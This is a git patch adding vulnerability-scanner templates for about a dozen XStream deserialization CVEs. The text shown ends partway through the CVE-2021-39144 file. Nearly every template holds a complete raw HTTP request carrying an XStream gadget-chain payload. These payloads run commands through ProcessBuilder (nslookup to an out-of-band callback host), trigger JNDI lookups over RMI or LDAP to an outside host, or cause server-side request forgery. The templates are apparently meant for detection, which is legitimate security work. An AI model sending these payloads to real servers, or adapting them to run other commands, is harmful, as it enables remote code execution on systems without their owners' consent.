From d1cfaa0a7b76d14a4446b852758216fc0dc615f6 Mon Sep 17 00:00:00 2001
From: pwnhxl <718701810@qq.com>
Date: Sun, 12 Mar 2023 11:38:05 +0800
Subject: [PATCH] xstream-ssrf-rce

---
 vulnerabilities/xstream/CVE-2013-7285.yaml   |  36 ++++
 vulnerabilities/xstream/CVE-2020-26217.yaml  |  77 ++++++++
 vulnerabilities/xstream/CVE-2020-26258.yaml  |  44 +++++
 vulnerabilities/xstream/CVE-2021-21344.yaml  | 128 ++++++++++++
 vulnerabilities/xstream/CVE-2021-21345.yaml  |  85 ++++++++
 vulnerabilities/xstream/CVE-2021-21351.yaml  | 101 ++++++++++
 vulnerabilities/xstream/CVE-2021-29505.yaml  |  82 ++++++++
 vulnerabilities/xstream/CVE-2021-39141.yaml  | 197 +++++++++++++++++++
 vulnerabilities/xstream/CVE-2021-39144 .yaml |  64 ++++++
 vulnerabilities/xstream/CVE-2021-39146.yaml  |  84 ++++++++
 vulnerabilities/xstream/CVE-2021-39152.yaml  |  49 +++++
 vulnerabilities/xstream/CVE-2021-39154.yaml  |  84 ++++++++
 12 files changed, 1031 insertions(+)
 create mode 100644 vulnerabilities/xstream/CVE-2013-7285.yaml
 create mode 100644 vulnerabilities/xstream/CVE-2020-26217.yaml
 create mode 100644 vulnerabilities/xstream/CVE-2020-26258.yaml
 create mode 100644 vulnerabilities/xstream/CVE-2021-21344.yaml
 create mode 100644 vulnerabilities/xstream/CVE-2021-21345.yaml
 create mode 100644 vulnerabilities/xstream/CVE-2021-21351.yaml
 create mode 100644 vulnerabilities/xstream/CVE-2021-29505.yaml
 create mode 100644 vulnerabilities/xstream/CVE-2021-39141.yaml
 create mode 100644 vulnerabilities/xstream/CVE-2021-39144 .yaml
 create mode 100644 vulnerabilities/xstream/CVE-2021-39146.yaml
 create mode 100644 vulnerabilities/xstream/CVE-2021-39152.yaml
 create mode 100644 vulnerabilities/xstream/CVE-2021-39154.yaml

diff --git a/vulnerabilities/xstream/CVE-2013-7285.yaml b/vulnerabilities/xstream/CVE-2013-7285.yaml
new file mode 100644
index 0000000000..8d573ad2ca
--- /dev/null
+++ b/vulnerabilities/xstream/CVE-2013-7285.yaml
@@ -0,0 +1,36 @@
+id: CVE-2013-7285
+
+info:
+  name: CVE-2013-7285
+  author: pwnhxl
+  severity: high
+  description: The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that can execute arbitrary shell commands.
+  reference:
+    - http://x-stream.github.io/CVE-2013-7285.html
+  tags: cve,cve-2013,xstream,deserialization,rce
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+
+        <contact class='dynamic-proxy'>
+          <interface>org.company.model.Contact</interface>
+          <handler class='java.beans.EventHandler'>
+            <target class='java.lang.ProcessBuilder'>
+              <command>
+                <string>nslookup {{interactsh-url}}</string>
+              </command>
+            </target>
+            <action>start</action>
+          </handler>
+        </contact>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
diff --git a/vulnerabilities/xstream/CVE-2020-26217.yaml b/vulnerabilities/xstream/CVE-2020-26217.yaml
new file mode 100644
index 0000000000..9f63029d53
--- /dev/null
+++ b/vulnerabilities/xstream/CVE-2020-26217.yaml
@@ -0,0 +1,77 @@
+id: CVE-2020-26217
+
+info:
+  name: CVE-2020-26217
+  author: pwnhxl
+  severity: high
+  description: All versions until and including version 1.4.13 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist.
+  reference:
+    - https://x-stream.github.io/CVE-2020-26217.html
+  tags: cve,cve-2020,xstream,deserialization,rce
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+
+        <map>
+          <entry>
+            <jdk.nashorn.internal.objects.NativeString>
+              <flags>0</flags>
+              <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
+                <dataHandler>
+                  <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
+                    <contentType>text/plain</contentType>
+                    <is class='java.io.SequenceInputStream'>
+                      <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
+                        <iterator class='javax.imageio.spi.FilterIterator'>
+                          <iter class='java.util.ArrayList$Itr'>
+                            <cursor>0</cursor>
+                            <lastRet>-1</lastRet>
+                            <expectedModCount>1</expectedModCount>
+                            <outer-class>
+                              <java.lang.ProcessBuilder>
+                                <command>
+                                  <string>nslookup {{interactsh-url}}</string>
+                                </command>
+                              </java.lang.ProcessBuilder>
+                            </outer-class>
+                          </iter>
+                          <filter class='javax.imageio.ImageIO$ContainsFilter'>
+                            <method>
+                              <class>java.lang.ProcessBuilder</class>
+                              <name>start</name>
+                              <parameter-types/>
+                            </method>
+                            <name>start</name>
+                          </filter>
+                          <next/>
+                        </iterator>
+                        <type>KEYS</type>
+                      </e>
+                      <in class='java.io.ByteArrayInputStream'>
+                        <buf></buf>
+                        <pos>0</pos>
+                        <mark>0</mark>
+                        <count>0</count>
+                      </in>
+                    </is>
+                    <consumed>false</consumed>
+                  </dataSource>
+                  <transferFlavors/>
+                </dataHandler>
+                <dataLen>0</dataLen>
+              </value>
+            </jdk.nashorn.internal.objects.NativeString>
+            <string>test</string>
+          </entry>
+        </map>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
diff --git a/vulnerabilities/xstream/CVE-2020-26258.yaml b/vulnerabilities/xstream/CVE-2020-26258.yaml
new file mode 100644
index 0000000000..fbf5487e4e
--- /dev/null
+++ b/vulnerabilities/xstream/CVE-2020-26258.yaml
@@ -0,0 +1,44 @@
+id: CVE-2020-26258
+
+info:
+  name: CVE-2020-26258
+  author: pwnhxl
+  severity: high
+  description: The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request.
+  reference:
+    - https://x-stream.github.io/CVE-2020-26258.html
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258
+  tags: cve,cve-2020,xstream,ssrf
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+        Content-Length: 540
+
+        <map>
+          <entry>
+            <jdk.nashorn.internal.objects.NativeString>
+              <flags>0</flags>
+              <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
+                <dataHandler>
+                  <dataSource class='javax.activation.URLDataSource'>
+                    <url>http://{{interactsh-url}}/internal/:</url>
+                  </dataSource>
+                  <transferFlavors/>
+                </dataHandler>
+                <dataLen>0</dataLen>
+              </value>
+            </jdk.nashorn.internal.objects.NativeString>
+            <string>test</string>
+          </entry>
+        </map>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
diff --git a/vulnerabilities/xstream/CVE-2021-21344.yaml b/vulnerabilities/xstream/CVE-2021-21344.yaml
new file mode 100644
index 0000000000..2b42470f61
--- /dev/null
+++ b/vulnerabilities/xstream/CVE-2021-21344.yaml
@@ -0,0 +1,128 @@
+id: CVE-2021-21344
+
+info:
+  name: CVE-2021-21344
+  author: pwnhxl
+  severity: high
+  description: The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.
+  reference:
+    - https://x-stream.github.io/CVE-2021-21344.html
+  tags: cve,cve-2021,xstream,deserialization,rce
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+
+        <java.util.PriorityQueue serialization='custom'>
+          <unserializable-parents/>
+          <java.util.PriorityQueue>
+            <default>
+              <size>2</size>
+              <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
+                <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
+                  <packet>
+                    <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
+                      <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
+                        <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
+                          <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
+                            <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
+                              <jaxbType>com.sun.rowset.JdbcRowSetImpl</jaxbType>
+                              <uriProperties/>
+                              <attributeProperties/>
+                              <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
+                                <getter>
+                                  <class>com.sun.rowset.JdbcRowSetImpl</class>
+                                  <name>getDatabaseMetaData</name>
+                                  <parameter-types/>
+                                </getter>
+                              </inheritedAttWildcard>
+                            </bi>
+                            <tagName/>
+                            <context>
+                              <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
+                                <outer-class reference='../..'/>
+                              </marshallerPool>
+                              <nameList>
+                                <nsUriCannotBeDefaulted>
+                                  <boolean>true</boolean>
+                                </nsUriCannotBeDefaulted>
+                                <namespaceURIs>
+                                  <string>1</string>
+                                </namespaceURIs>
+                                <localNames>
+                                  <string>UTF-8</string>
+                                </localNames>
+                              </nameList>
+                            </context>
+                          </bridge>
+                        </bridge>
+                        <jaxbObject class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
+                          <javax.sql.rowset.BaseRowSet>
+                            <default>
+                              <concurrency>1008</concurrency>
+                              <escapeProcessing>true</escapeProcessing>
+                              <fetchDir>1000</fetchDir>
+                              <fetchSize>0</fetchSize>
+                              <isolation>2</isolation>
+                              <maxFieldSize>0</maxFieldSize>
+                              <maxRows>0</maxRows>
+                              <queryTimeout>0</queryTimeout>
+                              <readOnly>true</readOnly>
+                              <rowSetType>1004</rowSetType>
+                              <showDeleted>false</showDeleted>
+                              <dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>
+                              <params/>
+                            </default>
+                          </javax.sql.rowset.BaseRowSet>
+                          <com.sun.rowset.JdbcRowSetImpl>
+                            <default>
+                              <iMatchColumns>
+                                <int>-1</int>
+                                <int>-1</int>
+                                <int>-1</int>
+                                <int>-1</int>
+                                <int>-1</int>
+                                <int>-1</int>
+                                <int>-1</int>
+                                <int>-1</int>
+                                <int>-1</int>
+                                <int>-1</int>
+                              </iMatchColumns>
+                              <strMatchColumns>
+                                <string>foo</string>
+                                <null/>
+                                <null/>
+                                <null/>
+                                <null/>
+                                <null/>
+                                <null/>
+                                <null/>
+                                <null/>
+                                <null/>
+                              </strMatchColumns>
+                            </default>
+                          </com.sun.rowset.JdbcRowSetImpl>
+                        </jaxbObject>
+                      </dataSource>
+                    </message>
+                    <satellites/>
+                    <invocationProperties/>
+                  </packet>
+                </indexMap>
+              </comparator>
+            </default>
+            <int>3</int>
+            <string>javax.xml.ws.binding.attachments.inbound</string>
+            <string>javax.xml.ws.binding.attachments.inbound</string>
+          </java.util.PriorityQueue>
+        </java.util.PriorityQueue>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
diff --git a/vulnerabilities/xstream/CVE-2021-21345.yaml b/vulnerabilities/xstream/CVE-2021-21345.yaml
new file mode 100644
index 0000000000..aef662bdaa
--- /dev/null
+++ b/vulnerabilities/xstream/CVE-2021-21345.yaml
@@ -0,0 +1,85 @@
+id: CVE-2021-21345
+
+info:
+  name: CVE-2021-21345
+  author: pwnhxl
+  severity: high
+  description: All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+  reference:
+    - https://x-stream.github.io/CVE-2021-21345.html
+  tags: cve,cve-2021,xstream,deserialization,rce
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+        Content-Length: 2799
+
+        <java.util.PriorityQueue serialization='custom'>
+          <unserializable-parents/>
+          <java.util.PriorityQueue>
+            <default>
+              <size>2</size>
+              <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
+                <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
+                  <packet>
+                    <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
+                      <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
+                        <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
+                          <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
+                            <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
+                              <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>
+                              <uriProperties/>
+                              <attributeProperties/>
+                              <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
+                                <getter>
+                                  <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>
+                                  <name>verify</name>
+                                  <parameter-types/>
+                                </getter>
+                              </inheritedAttWildcard>
+                            </bi>
+                            <tagName/>
+                            <context>
+                              <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
+                                <outer-class reference='../..'/>
+                              </marshallerPool>
+                              <nameList>
+                                <nsUriCannotBeDefaulted>
+                                  <boolean>true</boolean>
+                                </nsUriCannotBeDefaulted>
+                                <namespaceURIs>
+                                  <string>1</string>
+                                </namespaceURIs>
+                                <localNames>
+                                  <string>UTF-8</string>
+                                </localNames>
+                              </nameList>
+                            </context>
+                          </bridge>
+                        </bridge>
+                        <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>
+                          <activationCmd>nslookup {{interactsh-url}}</activationCmd>
+                        </jaxbObject>
+                      </dataSource>
+                    </message>
+                    <satellites/>
+                    <invocationProperties/>
+                  </packet>
+                </indexMap>
+              </comparator>
+            </default>
+            <int>3</int>
+            <string>javax.xml.ws.binding.attachments.inbound</string>
+            <string>javax.xml.ws.binding.attachments.inbound</string>
+          </java.util.PriorityQueue>
+        </java.util.PriorityQueue>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
diff --git a/vulnerabilities/xstream/CVE-2021-21351.yaml b/vulnerabilities/xstream/CVE-2021-21351.yaml
new file mode 100644
index 0000000000..362a88be6f
--- /dev/null
+++ b/vulnerabilities/xstream/CVE-2021-21351.yaml
@@ -0,0 +1,101 @@
+id: CVE-2021-21351
+
+info:
+  name: CVE-2021-21351
+  author: pwnhxl
+  severity: high
+  description: XStream uses a blocklist mechanism when parsing XML text which is utilized to defend against deserialization vulnerabilities, but in 1.4.15 and earlier, blocklists are incomplete and attackers could use javax.naming.ldap.Rdn$RdnEntry and javax.sql.rowset.BaseRowSet to make an JNDI injection and execute arbitrary commands finally.
+  reference:
+    - https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351
+    - https://x-stream.github.io/CVE-2021-21351.html
+    - https://paper.seebug.org/1543/
+  tags: cve,cve-2021,xstream,deserialization,rce
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+
+        <sorted-set>
+          <javax.naming.ldap.Rdn_-RdnEntry>
+            <type>ysomap</type>
+            <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
+              <m__DTMXRTreeFrag>
+                <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
+                  <m__size>-10086</m__size>
+                  <m__mgrDefault>
+                    <__overrideDefaultParser>false</__overrideDefaultParser>
+                    <m__incremental>false</m__incremental>
+                    <m__source__location>false</m__source__location>
+                    <m__dtms>
+                      <null/>
+                    </m__dtms>
+                    <m__defaultHandler/>
+                  </m__mgrDefault>
+                  <m__shouldStripWS>false</m__shouldStripWS>
+                  <m__indexing>false</m__indexing>
+                  <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
+                    <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
+                      <javax.sql.rowset.BaseRowSet>
+                        <default>
+                          <concurrency>1008</concurrency>
+                          <escapeProcessing>true</escapeProcessing>
+                          <fetchDir>1000</fetchDir>
+                          <fetchSize>0</fetchSize>
+                          <isolation>2</isolation>
+                          <maxFieldSize>0</maxFieldSize>
+                          <maxRows>0</maxRows>
+                          <queryTimeout>0</queryTimeout>
+                          <readOnly>true</readOnly>
+                          <rowSetType>1004</rowSetType>
+                          <showDeleted>false</showDeleted>
+                          <dataSource>rmi://{{interactsh-url}}/test</dataSource>
+                          <listeners/>
+                          <params/>
+                        </default>
+                      </javax.sql.rowset.BaseRowSet>
+                      <com.sun.rowset.JdbcRowSetImpl>
+                        <default/>
+                      </com.sun.rowset.JdbcRowSetImpl>
+                    </fPullParserConfig>
+                    <fConfigSetInput>
+                      <class>com.sun.rowset.JdbcRowSetImpl</class>
+                      <name>setAutoCommit</name>
+                      <parameter-types>
+                        <class>boolean</class>
+                      </parameter-types>
+                    </fConfigSetInput>
+                    <fConfigParse reference='../fConfigSetInput'/>
+                    <fParseInProgress>false</fParseInProgress>
+                  </m__incrementalSAXSource>
+                  <m__walker>
+                    <nextIsRaw>false</nextIsRaw>
+                  </m__walker>
+                  <m__endDocumentOccured>false</m__endDocumentOccured>
+                  <m__idAttributes/>
+                  <m__textPendingStart>-1</m__textPendingStart>
+                  <m__useSourceLocationProperty>false</m__useSourceLocationProperty>
+                  <m__pastFirstElement>false</m__pastFirstElement>
+                </m__dtm>
+                <m__dtmIdentity>1</m__dtmIdentity>
+              </m__DTMXRTreeFrag>
+              <m__dtmRoot>1</m__dtmRoot>
+              <m__allowRelease>false</m__allowRelease>
+            </value>
+          </javax.naming.ldap.Rdn_-RdnEntry>
+          <javax.naming.ldap.Rdn_-RdnEntry>
+            <type>ysomap</type>
+            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+              <m__obj class='string'>test</m__obj>
+            </value>
+          </javax.naming.ldap.Rdn_-RdnEntry>
+        </sorted-set>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
diff --git a/vulnerabilities/xstream/CVE-2021-29505.yaml b/vulnerabilities/xstream/CVE-2021-29505.yaml
new file mode 100644
index 0000000000..038797ce97
--- /dev/null
+++ b/vulnerabilities/xstream/CVE-2021-29505.yaml
@@ -0,0 +1,82 @@
+id: CVE-2021-29505
+
+info:
+  name: CVE-2021-29505
+  author: pwnhxl
+  severity: high
+  description: All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+  reference:
+    - https://paper.seebug.org/1543/
+    - https://github.com/vulhub/vulhub/blob/master/xstream/CVE-2021-29505/README.zh-cn.md
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29505
+  tags: cve,cve-2021,xstream,deserialization,rce
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+
+        <java.util.PriorityQueue serialization='custom'>
+            <unserializable-parents/>
+            <java.util.PriorityQueue>
+                <default>
+                    <size>2</size>
+                </default>
+                <int>3</int>
+                <javax.naming.ldap.Rdn_-RdnEntry>
+                    <type>12345</type>
+                    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+                        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
+                    </value>
+                </javax.naming.ldap.Rdn_-RdnEntry>
+                <javax.naming.ldap.Rdn_-RdnEntry>
+                    <type>12345</type>
+                    <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
+                        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
+                            <parsedMessage>true</parsedMessage>
+                            <soapVersion>SOAP_11</soapVersion>
+                            <bodyParts/>
+                            <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
+                                <attachmentsInitialized>false</attachmentsInitialized>
+                                <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
+                                    <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
+                                        <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
+                                            <names>
+                                                <string>aa</string>
+                                                <string>aa</string>
+                                            </names>
+                                            <ctx>
+                                                <environment/>
+                                                <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
+                                                    <java.rmi.server.RemoteObject>
+                                                        <string>UnicastRef</string>
+                                                        <string>{{interactsh-url}}</string>
+                                                        <int>1099</int>
+                                                        <long>0</long>
+                                                        <int>0</int>
+                                                        <long>0</long>
+                                                        <short>0</short>
+                                                        <boolean>false</boolean>
+                                                    </java.rmi.server.RemoteObject>
+                                                </registry>
+                                                <host>{{interactsh-url}}</host>
+                                                <port>1099</port>
+                                            </ctx>
+                                        </candidates>
+                                    </aliases>
+                                </nullIter>
+                            </sm>
+                        </message>
+                    </value>
+                </javax.naming.ldap.Rdn_-RdnEntry>
+            </java.util.PriorityQueue>
+        </java.util.PriorityQueue>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
diff --git a/vulnerabilities/xstream/CVE-2021-39141.yaml b/vulnerabilities/xstream/CVE-2021-39141.yaml
new file mode 100644
index 0000000000..728885285a
--- /dev/null
+++ b/vulnerabilities/xstream/CVE-2021-39141.yaml
@@ -0,0 +1,197 @@
+id: CVE-2021-39141
+
+info:
+  name: CVE-2021-39141
+  author: pwnhxl
+  severity: high
+  description: All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+  reference:
+    - http://x-stream.github.io/CVE-2021-39141.html
+  tags: cve,cve-2021,xstream,deserialization,rce
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+
+        <java.util.PriorityQueue serialization='custom'>
+          <unserializable-parents/>
+          <java.util.PriorityQueue>
+            <default>
+              <size>2</size>
+            </default>
+            <int>3</int>
+            <dynamic-proxy>
+              <interface>java.lang.Comparable</interface>
+              <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
+                <owner/>
+                <managedObjectManagerClosed>false</managedObjectManagerClosed>
+                <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
+                  <stubHandlers>
+                    <entry>
+                      <method>
+                        <class>java.lang.Comparable</class>
+                        <name>compareTo</name>
+                        <parameter-types>
+                          <class>java.lang.Object</class>
+                        </parameter-types>
+                      </method>
+                      <com.sun.xml.internal.ws.client.sei.StubHandler>
+                        <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
+                          <indices>
+                            <int>0</int>
+                          </indices>
+                          <getters>
+                            <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
+                          </getters>
+                          <accessors>
+                            <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
+                              <val_-isJAXBElement>false</val_-isJAXBElement>
+                              <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
+                                <type>int</type>
+                                <field>
+                                  <name>hash</name>
+                                  <clazz>java.lang.String</clazz>
+                                </field>
+                              </val_-getter>
+                              <val_-isListType>false</val_-isListType>
+                              <val_-n>
+                                <namespaceURI/>
+                                <localPart>hash</localPart>
+                                <prefix/>
+                              </val_-n>
+                              <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
+                                <type>java.lang.String</type>
+                                <method>
+                                  <class>javax.naming.InitialContext</class>
+                                  <name>doLookup</name>
+                                  <parameter-types>
+                                    <class>java.lang.String</class>
+                                  </parameter-types>
+                                </method>
+                              </val_-setter>
+                              <outer-class>
+                                <propertySetters>
+                                  <entry>
+                                    <string>serialPersistentFields</string>
+                                    <com.sun.xml.internal.ws.spi.db.FieldSetter>
+                                      <type>[Ljava.io.ObjectStreamField;</type>
+                                      <field>
+                                        <name>serialPersistentFields</name>
+                                        <clazz>java.lang.String</clazz>
+                                      </field>
+                                    </com.sun.xml.internal.ws.spi.db.FieldSetter>
+                                  </entry>
+                                  <entry>
+                                    <string>CASE_INSENSITIVE_ORDER</string>
+                                    <com.sun.xml.internal.ws.spi.db.FieldSetter>
+                                      <type>java.util.Comparator</type>
+                                      <field>
+                                        <name>CASE_INSENSITIVE_ORDER</name>
+                                        <clazz>java.lang.String</clazz>
+                                      </field>
+                                    </com.sun.xml.internal.ws.spi.db.FieldSetter>
+                                  </entry>
+                                  <entry>
+                                    <string>serialVersionUID</string>
+                                    <com.sun.xml.internal.ws.spi.db.FieldSetter>
+                                      <type>long</type>
+                                      <field>
+                                        <name>serialVersionUID</name>
+                                        <clazz>java.lang.String</clazz>
+                                      </field>
+                                    </com.sun.xml.internal.ws.spi.db.FieldSetter>
+                                  </entry>
+                                  <entry>
+                                    <string>value</string>
+                                    <com.sun.xml.internal.ws.spi.db.FieldSetter>
+                                      <type>[C</type>
+                                      <field>
+                                        <name>value</name>
+                                        <clazz>java.lang.String</clazz>
+                                      </field>
+                                    </com.sun.xml.internal.ws.spi.db.FieldSetter>
+                                  </entry>
+                                  <entry>
+                                    <string>hash</string>
+                                    <com.sun.xml.internal.ws.spi.db.FieldSetter>
+                                      <type>int</type>
+                                      <field reference='../../../../../val_-getter/field'/>
+                                    </com.sun.xml.internal.ws.spi.db.FieldSetter>
+                                  </entry>
+                                </propertySetters>
+                                <propertyGetters>
+                                  <entry>
+                                    <string>serialPersistentFields</string>
+                                    <com.sun.xml.internal.ws.spi.db.FieldGetter>
+                                      <type>[Ljava.io.ObjectStreamField;</type>
+                                      <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+                                    </com.sun.xml.internal.ws.spi.db.FieldGetter>
+                                  </entry>
+                                  <entry>
+                                    <string>CASE_INSENSITIVE_ORDER</string>
+                                    <com.sun.xml.internal.ws.spi.db.FieldGetter>
+                                      <type>java.util.Comparator</type>
+                                      <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+                                    </com.sun.xml.internal.ws.spi.db.FieldGetter>
+                                  </entry>
+                                  <entry>
+                                    <string>serialVersionUID</string>
+                                    <com.sun.xml.internal.ws.spi.db.FieldGetter>
+                                      <type>long</type>
+                                      <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+                                    </com.sun.xml.internal.ws.spi.db.FieldGetter>
+                                  </entry>
+                                  <entry>
+                                    <string>value</string>
+                                    <com.sun.xml.internal.ws.spi.db.FieldGetter>
+                                      <type>[C</type>
+                                      <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+                                    </com.sun.xml.internal.ws.spi.db.FieldGetter>
+                                  </entry>
+                                  <entry>
+                                    <string>hash</string>
+                                    <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>
+                                  </entry>
+                                </propertyGetters>
+                                <elementLocalNameCollision>false</elementLocalNameCollision>
+                                <contentClass>java.lang.String</contentClass>
+                                <elementDeclaredTypes/>
+                              </outer-class>
+                            </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
+                          </accessors>
+                          <wrapper>java.lang.Object</wrapper>
+                          <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>
+                          <dynamicWrapper>false</dynamicWrapper>
+                        </bodyBuilder>
+                        <isOneWay>false</isOneWay>
+                      </com.sun.xml.internal.ws.client.sei.StubHandler>
+                    </entry>
+                  </stubHandlers>
+                  <clientConfig>false</clientConfig>
+                </databinding>
+                <methodHandlers>
+                  <entry>
+                    <method reference='../../../databinding/stubHandlers/entry/method'/>
+                    <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
+                      <owner reference='../../../..'/>
+                      <method reference='../../../../databinding/stubHandlers/entry/method'/>
+                      <isVoid>false</isVoid>
+                      <isOneway>false</isOneway>
+                    </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
+                  </entry>
+                </methodHandlers>
+              </handler>
+            </dynamic-proxy>
+            <string>ldap://{{interactsh-url}}/#evil</string>
+          </java.util.PriorityQueue>
+        </java.util.PriorityQueue>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
diff --git a/vulnerabilities/xstream/CVE-2021-39144 .yaml b/vulnerabilities/xstream/CVE-2021-39144 .yaml
new file mode 100644
index 0000000000..a52fe013e2
--- /dev/null
+++ b/vulnerabilities/xstream/CVE-2021-39144 .yaml	
@@ -0,0 +1,64 @@
+id: CVE-2021-39144
+
+info:
+  name: CVE-2021-39144
+  author: pwnhxl
+  severity: high
+  description: All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+  reference:
+    - http://x-stream.github.io/CVE-2021-39144.html
+  tags: cve,cve-2021,xstream,deserialization,rce
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+        Content-Length: 1269
+
+        <java.util.PriorityQueue serialization='custom'>
+          <unserializable-parents/>
+          <java.util.PriorityQueue>
+            <default>
+              <size>2</size>
+            </default>
+            <int>3</int>
